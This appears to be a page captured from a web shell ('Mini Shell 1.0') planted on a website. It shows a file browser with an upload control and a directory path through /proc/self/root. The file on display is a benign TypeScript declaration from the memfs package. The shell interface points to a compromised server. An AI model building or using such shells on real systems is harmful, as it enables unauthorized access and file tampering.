HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/self/root/usr/share/node_modules/memfs/lib/
Upload File :
Current File : //proc/self/root/usr/share/node_modules/memfs/lib/process.d.ts
export interface IProcess {
    getuid?(): number;
    getgid?(): number;
    cwd(): string;
    platform: string;
    nextTick: (callback: (...args: any[]) => void, ...args: any[]) => void;
    emitWarning: (message: string, type: string) => void;
    env: {};
}
export declare function createProcess(): IProcess;
declare const _default: IProcess;
export default _default;